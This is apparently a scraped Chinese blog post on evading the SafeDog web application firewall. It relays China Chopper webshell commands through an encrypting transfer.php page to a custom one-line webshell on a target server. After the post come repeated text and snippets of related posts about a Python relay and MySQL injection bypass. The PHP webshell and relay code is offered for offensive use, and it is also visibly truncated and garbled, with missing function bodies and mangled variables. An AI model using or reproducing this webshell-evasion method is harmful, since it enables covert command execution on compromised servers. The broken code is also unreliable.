中轉Webshell 繞過安全狗(一)

2022-04-02 23:15:18 字數 1472 閱讀 8797

前言

聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。

原理

菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引數全部進行加密,然後再傳送給shell,shell接收後用同樣的演算法進行解密,執行命令。

本地127.0.0.1,安裝phpstudy

transfer.php

<?php 

function encode($str)

// webshell位址,transserv.php為定製一句話

$webshell = '';

$pdata = $_post;//接受所有post資料,陣列

//var_dump($pdata);

foreach($pdata as $key=>$value)

// 菜刀密碼

if($key == 'x')

}$data = http_build_query($pdata);//模擬http請求的,把得到的資料data通過函式url-encode請求

//var_dump($data);//str字串

//模擬post、get請求,建立資源流上下文,資料報

$html = @file_get_contents($webshell, false, $context);

echo $html;

?>

服務端
192.168.253.129,安裝安全狗

transserv.php

<?php 

$ds = @$/*-*/['x'];

//echo $ds;

if (!empty($ds) )

本地中國菜刀連線   密碼:x

中轉Webshell 繞過安全狗(一)

前言 聽說中國菜刀裡有後門。抓包我是沒有監測到異常資料報。為了以防萬一,且更好使用中國菜刀硬槓安全狗。筆者收集了一下資料。無恥的copy大佬的原始碼,只是在大佬的基礎上簡單修改了一下,達到webshell繞過安全狗。原理 菜刀不直接向shell傳送資料,而是傳送到中轉的乙個頁面上,這個頁面對接收的引...

中轉Webshell 繞過安全狗(二)

前言 在實踐中轉webshell繞過安全狗 一 中,在服務端和客戶端均為php。某大佬提示並分享資源後,打算使用python完成中轉。部分 無恥copy。本地127.0.0.1,安裝python2 phpshellproxy.py coding utf 8 import sys reload sys...

繞安全狗mysql Mysql注入繞過安全狗

mysql注入繞過安全狗 sql注入閉合檢查 sql注入的分類有很多種分法 可以分成數字型和字元型,區別在於是否需要完整閉合。本題中由於我經驗不足,試了好久才想到就是簡單的雙引號加括號就可以閉合了,然後再注釋掉後面的內容。單引號 回顯正常結果 雙引號錯誤回顯 這裡其實可以簡單分析一下,1 是get請...